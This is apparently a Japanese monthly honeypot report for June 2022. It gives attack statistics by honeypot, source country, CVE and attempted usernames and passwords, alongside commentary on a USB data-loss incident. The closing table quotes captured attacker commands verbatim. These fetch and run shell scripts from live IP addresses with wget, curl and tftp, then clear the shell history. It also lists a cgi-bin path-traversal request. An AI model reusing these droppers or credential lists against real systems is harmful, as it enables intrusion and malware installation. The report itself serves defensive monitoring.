ハニーポット運用(月次報告:2022年6月)
今月のTopics
6月21日(火)にBIPROGY社の協力会社社員による大規模な情報漏洩事故が発生した。
コールセンターでのデータ移管作業用に尼崎市の全市民(約46万人分)の個人情報を含むUSBメモリーを就業先から持ち出した後、帰宅時に当該USBメモリーを入れたかばんの紛失したとの報道による発表がなされた。
本件にはUSBを用いた情報セキュリティ運用の典型的な例であり、身につまされる事故である。
考えられる問題点は以下の通り。
- USBの持ち出しについて再委託先社員による持ち出し運用を尼崎市が把握しておらず、尼崎市が受託者に対してUSBメモリー持ち出時の許可を得る運用を徹底していなかったこと。
- 情報の運搬にあたり、BIPROGY社の協力会社社員が個人でUSBメモリーを就業先から持ち出したこと。
- BIPROGY社の協力会社社員によるUSBメモリーの運搬にあたり、適切な対応がとられていないこと。
- 情報漏洩発生時に即座に関係先への情報連絡がなされず、BIPROGY社の協力会社社員が個人で捜索した後に情報連絡がなされたこと。
何はともあれ6/24に対象のUSBメモリーが発見されて良かったものである。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2022年6月10日-2022年6月30日
運用期間:20日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先月比 |
---|---|---|---|
1 | Ddospot | 1,170,161 | 211,433 |
2 | Cowrie | 985,516 | ▲610,883 |
3 | Honeytrap | 636,355 | ▲272,039 |
4 | Dionaea | 392,151 | 34,410 |
5 | Heralding | 287,000 | ▲548,748 |
6 | Mailoney | 27,384 | 11,345 |
7 | Adbhoney | 7,870 | ▲6,428 |
8 | Tanner | 4,026 | ▲2,634 |
9 | Redishoneypot | 2,426 | ▲2,062 |
10 | ConPot | 1,840 | ▲279 |
11 | CitrixHoneypot | 1,562 | ▲1,322 |
12 | Ciscoasa | 1,501 | ▲1,456 |
13 | ElasticPot | 693 | ▲193 |
14 | Ipphoney | 149 | ▲62 |
15 | Medpot | 120 | ▲1,414 |
16 | Dicompot | 81 | ▲75 |
- Result
- Ddospotへのアクセス数が増加していた。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | Brazil | 673,263 | ↑(8) |
2 | United States | 398,933 | →(2) |
3 | China | 386,464 | →(3) |
4 | Netherlands | 317,730 | ↓(1) |
5 | Russia | 163,777 | ↓(4) |
6 | Japan | 129,188 | ↓(5) |
7 | Ireland | 91,700 | ↑(圏外) |
8 | India | 63,168 | ↑(10) |
9 | Vietnam | 62,249 | ↑(14) |
10 | United Kingdom | 55,822 | ↑(16) |
11 | Germany | 51,174 | ↓(6) |
12 | Singapore | 47,327 | ↓(11) |
13 | South Korea | 38,781 | ↓(12) |
14 | Bangladesh | 32,478 | ↑(圏外) |
15 | Indonesia | 29,213 | ↑(19) |
16 | Sweden | 26,230 | ↑(20) |
17 | France | 25,208 | ↓(13) |
18 | Hong Kong | 24,849 | →(18) |
19 | Panama | 21,789 | ↑(圏外) |
20 | Costa Rica | 20,997 | ↑(圏外) |
- Result
- 集計期間が少ないこともあるがブラジルからのアクセス数が一時的に増加し、ニュージーランドおよび中国からのアクセスが減少した。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | Count |
---|---|---|
1 | CVE-2020-11899 | 162,184 |
2 | CVE-2020-11910 | 3,393 |
3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 45 |
4 | CVE-1999-0016 | 1 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 71,677 |
2 | sa | 10,501 |
3 | admin | 7,972 |
4 | nproc | 3,682 |
5 | user | 2,176 |
6 | (empty) | 1,352 |
7 | support | 1,222 |
8 | test | 1,189 |
9 | 22 | 884 |
10 | postgres | 847 |
11 | ubuntu | 847 |
12 | oracle | 524 |
13 | 2Wire | 449 |
14 | !root | 430 |
15 | git | 389 |
16 | ftpuser | 358 |
17 | guest | 319 |
18 | www | 295 |
19 | adm | 290 |
20 | user2 | 263 |
21 | mysql | 257 |
22 | 666666 | 239 |
23 | blank | 236 |
24 | 0 | 235 |
25 | debug | 235 |
26 | jenkins | 228 |
27 | unknown | 228 |
28 | administrator | 227 |
29 | $ALOC$ | 223 |
30 | ubnt | 222 |
31 | deploy | 221 |
32 | testuser | 215 |
33 | ftp | 214 |
34 | anonymous | 208 |
35 | minecraft | 204 |
36 | Admin | 190 |
37 | user1 | 190 |
38 | db | 183 |
39 | web | 177 |
40 | wwwroot | 172 |
41 | test1 | 152 |
42 | www-data | 141 |
43 | dev | 135 |
44 | server | 132 |
45 | tomcat | 132 |
46 | alex | 126 |
47 | nagios | 126 |
48 | hadoop | 124 |
49 | steam | 122 |
50 | ts3 | 122 |
- Result
- 先月から変更なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | 123456 | 4,519 |
2 | admin | 4,313 |
3 | nproc | 3,682 |
4 | (empty) | 2,975 |
5 | 123 | 1,722 |
6 | password | 1,529 |
7 | 1234 | 1,435 |
8 | 1 | 1,326 |
9 | 12345 | 1,119 |
10 | suport | 727 |
11 | blank | 677 |
12 | 12345678 | 667 |
13 | 0 | 491 |
14 | test | 396 |
15 | user | 376 |
16 | 123456789 | 342 |
17 | 666666 | 318 |
18 | 123123 | 311 |
19 | ubnt | 304 |
20 | support | 301 |
21 | root | 291 |
22 | master | 282 |
23 | 1234567 | 268 |
24 | alpine | 262 |
25 | P@ssw0rd | 260 |
26 | 00000000 | 258 |
27 | 111111 | 247 |
28 | qwerty | 247 |
29 | backup | 246 |
30 | 1qaz2wsx | 244 |
31 | hi3518 | 232 |
32 | unknown | 231 |
33 | synnet | 227 |
34 | 10023 | 222 |
35 | _Cisco | 219 |
36 | !ishtar | 212 |
37 | 1q2w3e4r | 206 |
38 | admin123 | 204 |
39 | Passw0rd | 195 |
40 | test123 | 192 |
41 | abc123 | 190 |
42 | passw0rd | 190 |
43 | bosco | 172 |
44 | Pa$$w0rd | 171 |
45 | p@ssw0rd | 165 |
46 | 123qwe | 164 |
47 | 1234567890 | 162 |
48 | 12 | 152 |
49 | P@ssword | 151 |
50 | pa55word | 147 |
- Result
- 先月から変更なし
⑥今月のmasscanとZmap
- masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- masscanのアクセス数が通常の月と比較して増加傾向にあった。6月30日に複数回のアクセスを確認した。
最後に
- 情報漏洩事故が起こるとプロジェクト関係者の捜索隊が結成されて、関連先の一斉捜索が行われるのは今でも続いているのだろうか?情報漏洩事故の発生場所が大都市になればなるほど捜索範囲が広くて大変だった記憶がある。昔は新宿のコクーンタワーの真下の草むらに盗まれた財布がよく捨てられていたのだ。
- 余談ではあるが、今回の情報漏洩事故を聞いて2022年4月1日に日本ユニシス社が社名変更していたのは驚いた。日本有数の大企業であっても常に変革が行われていることを実感するものである。
◆shファイルに関するアクセス
No | アクセス内容 | 備考 |
---|---|---|
1 | /nig.sh | rm -rf nig.sh; rm -rf miori.*; wget http://2.56.59.225/nig.sh || curl -O http://2.56.59.225/nig.sh || tftp 2.56.59.225 -c get nig.sh || tftp -g -r nig.sh 2.56.59.225; chmod 777 nig.sh;./nig.sh ssh; rm -rf nig.sh |
2 | /brokeskid.sh | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://62.197.136.157/brokeskid.sh; chmod 777 *; sh brokeskid.sh; tftp -g 62.197.136.157 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c |
3 | /epgrec/do-record.sh | EPGrecは録画予約システムのWebアプリケーション |
4 | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | --- |
◆exeファイルに関するアクセス
No | アクセス内容 | 備考 |
---|---|---|
1 | /s.exe | --- |